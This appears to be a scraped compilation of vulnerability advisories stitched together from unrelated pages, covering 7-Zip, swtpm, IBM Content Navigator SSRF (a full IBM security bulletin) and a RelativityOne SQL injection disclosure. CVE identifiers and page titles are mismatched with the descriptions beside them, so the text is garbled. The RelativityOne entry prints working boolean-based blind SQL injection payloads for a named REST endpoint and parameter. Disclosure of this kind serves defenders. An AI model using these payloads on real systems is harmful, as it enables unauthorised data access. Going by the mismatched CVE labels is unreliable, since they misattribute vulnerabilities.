    *   -xtd switch can exclude directory metadata records from processing, if you don't need them by some reason.
        

Log in to post a comment.

CVE-2023-31102: 7-Zip / Discussion / Open Discussion: 7-Zip 23.00

In swtpm before 0.4.2 and 0.5.x before 0.5.1, a local attacker may be able to overwrite arbitrary files via a symlink attack against a temporary file such as TMP2-00.permall.

'1198395?cve=title' is not a valid bug number nor an alias to a bug.

Please press **Back** and try again.

CVE-2020-28407: Invalid Bug ID

IBM Content Navigator 3.0.13 is vulnerable to server-side request forgery (SSRF). This may allow an authenticated attacker to send unauthorized requests from the system, potentially leading to network enumeration or facilitating other attacks.  IBM X-Force ID:  259247.

  

**Summary**

Oracle Outside In Technology is used in some configurations of IBM Content Navigator as part of the document viewer. CVE-2023-35896.

**Vulnerability Details**

**CVEID:**   CVE-2023-35896  
**DESCRIPTION:**   IBM Content Navigator is vulnerable to server-side request forgery (SSRF). This may allow an authenticated attacker to send unauthorized requests from the system, potentially leading to network enumeration or facilitating other attacks.  
CVSS Base score: 5.4  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/259247 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N)

**Affected Products and Versions**

**Affected Product(s)**

**Version(s)** 

IBM Content Navigator

3.0.13

**Remediation/Fixes**

**Affected Product(s)**

**Version(s)**

**Remediation/Fix/Instructions**

IBM Content Navigator

3.0.13

Download 3.0.13 IF006 and follow instructions

**Workarounds and Mitigations**

Customers who do not use Oracle Outside In Technology are not affected.

**References**

Off

**Acknowledgement**

**Change History**

01 Nov 2023: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU056","label":"Miscellaneous"},"Product":{"code":"SSEUEX","label":"IBM Content Navigator"},"Component":"","Platform":\[{"code":"PF033","label":"Windows"},{"code":"PF016","label":"Linux"}\],"Version":"3.0.14 IF2, 3.0.13 IF5, 3.0.11 IF13","Edition":"","Line of Business":{"code":"LOB18","label":"Miscellaneous LOB"}}\]

CVE-2023-35896: IBM Content Navigator is vulnerable to Server Side Request Forgery leading to Arbitrary File Read due to Oracle Outside In Technology (CVE-2023-35896)

SQL Injection vulnerability in Relativity ODA LLC RelativityOne v.12.1.537.3 Patch 2 and earlier allows a remote attacker to execute arbitrary code via the name parameter.

SQL Injection vulnerability in Relativity ODA LLC RelativityOne v.12.1.537.3 Patch 2 and earlier allows a remote attacker to execute arbitrary code via the name parameter.

\[Vulnerability Type\] SQL Injection

\[Vendor of Product\] Relativity ODA LLC

\[Affected Product Code Base\] RelativityOne - 12.1.537.3 Patch 2 and earlier

\[Affected Component\] POST /Relativity.Rest/API/Relativity.Users/workspace//users/retrieveusersby

\[Attack Type\] Remote

\[Impact Code execution\] true

\[Attack Vectors\] Within the JSON POST parameter 'Name', the following payload will return true and display a list of names and emails:

(SELECT (CASE WHEN (1=1) THEN 03586 ELSE 3\*(SELECT 2 UNION ALL SELECT 1) END))

But the following payload will return false and display the message 'SQL Statement Failed':

(SELECT (CASE WHEN (1=2) THEN 03586 ELSE 3\*(SELECT 2 UNION ALL SELECT 1) END))

Note: the True/False comparison takes place within the CASE WHEN () clause.

\[Reference\] https://www.linkedin.com/in/jakedmurphy1/

\[Has vendor confirmed or acknowledged the vulnerability?\] true

\[Discoverer\] Jake Murphy

CVE-2023-46954: GitHub - jakedmurphy1/CVE-2023-46954

Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability